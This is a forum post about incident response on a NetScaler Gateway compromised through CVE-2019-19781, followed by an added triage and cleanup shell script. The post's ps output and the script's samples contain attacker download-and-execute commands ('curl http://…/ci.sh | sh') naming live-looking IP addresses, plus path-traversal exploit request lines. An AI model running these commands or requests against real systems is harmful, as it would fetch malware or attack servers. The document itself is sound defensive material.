
Are there any other points we should check, after implementing the mitigation steps for CVE-2019-19781?


Hidefusa Yakabe


Are there any other points which we should check on a polluted NetScaler Gateway, after implementing the mitigation steps for CVE-2019-19781?


- 1. Investigated with the link below:
https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/?utm_content=112033384&utm_medium=social&utm_source=twitter&hss_channel=tw-403811306

- 2. Found our gateway polluted: a curl command executing from the nobody user's crontab.
- 3. Renamed the curl command to curl.org in order to temporarily avoid executing the command.
- 4. Implemented the mitigation steps for CVE-2019-19781.
- 5. Renamed it back to curl, and then I see nobody's crontab still working.
How will we stop this command, and are there any other points we should investigate?
Thanks


ps -auxd | grep nobody
nobody     3307  0.0  0.1  8320  1644  ??  Ss    8:55PM   0:00.00 | | |-- /bin/sh -c curl http://62.113.112.33/ci.sh | sh > /dev/null 2>&1
nobody     3312  0.0  0.3 14740  4172  ??  S     8:55PM   0:00.01 | | | |-- curl http://62.113.112.33/ci.sh
nobody     3313  0.0  0.1  8320  1636  ??  S     8:55PM   0:00.00 | | | `-- sh
nobody     3315  0.0  0.0     0     0  ??  Z     8:55PM   0:00.00 | | `-- <defunct>
nobody     3305  0.0  0.1  8320  1644  ??  Ss    8:55PM   0:00.00 |   |-- /bin/sh -c curl http://185.178.45.221/ci.sh | sh > /dev/null 2>&1
nobody     3308  0.0  0.3 14740  4172  ??  S     8:55PM   0:00.01 |   | |-- curl http://185.178.45.221/ci.sh
nobody     3309  0.0  0.1  8320  1636  ??  S     8:55PM   0:00.00 |   | `-- sh
nobody     3314  0.0  0.0     0     0  ??  Z     8:55PM   0:00.00 |   `-- <defunct>

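The question above (how to stop the cron job and what else to check) as an added example, not code from the original thread or from Citrix: a small POSIX sh triage script. It assumes a FreeBSD userland on the appliance (crontab -u, pkill -U, gzip -cdf), that /netscaler/portal/templates, /var/tmp/netscaler/portal/templates and /var/vpn/bookmark are the directories the exploit writes template files into, and that /var/log/httpaccess.log* is the web access log. The ps, cron and log lines at the bottom are constructed to mirror the shape of the post's ps output and of an httpaccess.log; the function names are the example's own.

```shell
#!/bin/sh
# Added triage helpers for a NetScaler/ADC suspected of compromise via
# CVE-2019-19781. Not from the original post. Assumptions: FreeBSD userland
# on the appliance (crontab -u, pkill -U, gzip -cdf), the template and
# bookmark directories below as the places the exploit writes to, and
# /var/log/httpaccess.log* as the web access log. Detection functions read
# text on stdin so they can be exercised offline against the constructed
# samples at the bottom.

# Lines where a downloader (curl/wget/fetch) is piped straight into an
# interpreter, e.g. "curl http://host/ci.sh | sh" as seen in the post.
flag_download_exec() {
    grep -E '(curl|wget|fetch)[^|]*\|[[:space:]]*(sh|bash|perl|python)'
}

# httpaccess.log lines carrying the directory traversal into /vpns/, plain
# or URL-encoded, which is how the template-injection requests arrive.
find_vpns_traversal() {
    grep -iE '(\.\.|%2e%2e)/vpns/'
}

# Files under $1 modified within the last $2 days.
list_recent_files() {
    find "$1" -type f -mtime -"$2" 2>/dev/null
}

# Read-only sweep to run on the appliance shell itself.
triage_appliance() {
    echo '--- crontab of user nobody (should be empty) ---'
    crontab -u nobody -l 2>/dev/null || echo '(none)'
    echo '--- download-and-execute commands in the process list ---'
    ps -auxww | flag_download_exec || echo '(none)'
    echo '--- template/bookmark files changed in the last 30 days ---'
    for d in /netscaler/portal/templates /var/tmp/netscaler/portal/templates /var/vpn/bookmark; do
        list_recent_files "$d" 30
    done
    echo '--- traversal requests in httpaccess logs (rotated ones are gzipped) ---'
    gzip -cdf /var/log/httpaccess.log* 2>/dev/null | find_vpns_traversal || echo '(none)'
}

# Stops the re-spawning seen in the post: preserve the crontab as evidence,
# remove it, then kill what is still running as nobody. Renaming curl is not
# needed once the scheduler entry is gone. Run only on the affected box.
cleanup_nobody_cron() {
    evidence="/var/tmp/nobody.crontab.$(date +%s)"
    crontab -u nobody -l > "$evidence" 2>/dev/null && echo "saved crontab to $evidence"
    crontab -u nobody -r 2>/dev/null
    pkill -U nobody
}

# --- constructed samples (shape of the post's ps output and of httpaccess.log) ---
SAMPLE_PS='nobody  3307  /bin/sh -c curl http://62.113.112.33/ci.sh | sh > /dev/null 2>&1
nobody  3312  curl http://62.113.112.33/ci.sh
nobody  3313  sh
nobody  3305  /bin/sh -c curl http://185.178.45.221/ci.sh | sh > /dev/null 2>&1
nobody  3308  curl http://185.178.45.221/ci.sh
nobody  3309  sh'
SAMPLE_CRON='* * * * * curl http://62.113.112.33/ci.sh | sh > /dev/null 2>&1'
SAMPLE_LOG='10.0.0.5 - - [10/Jan/2020:21:04:11 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 83
10.0.0.5 - - [10/Jan/2020:21:04:12 +0000] "POST /vpn/%2E%2E/vpns/portal/scripts/newbm.pl HTTP/1.1" 200 5
192.0.2.7 - - [10/Jan/2020:21:05:00 +0000] "GET /vpn/index.html HTTP/1.1" 200 1840'

echo '== download-and-execute in constructed ps/cron samples =='
printf '%s\n' "$SAMPLE_PS" "$SAMPLE_CRON" | flag_download_exec
echo '== traversal requests in constructed log lines =='
printf '%s\n' "$SAMPLE_LOG" | find_vpns_traversal
```

Renaming curl only holds until the next cron run; the scheduler entry itself has to go, which is what cleanup_nobody_cron does after copying it aside as evidence (on this FreeBSD userland the file also lives under /var/cron/tabs/nobody). An empty crontab afterwards does not prove the appliance is clean: the downloaded ci.sh may have written templates, bookmarks or other files that triage_appliance only partly covers, so the usual end state is to keep the logs and the saved crontab and rebuild the appliance from known-good firmware rather than trust the patched box.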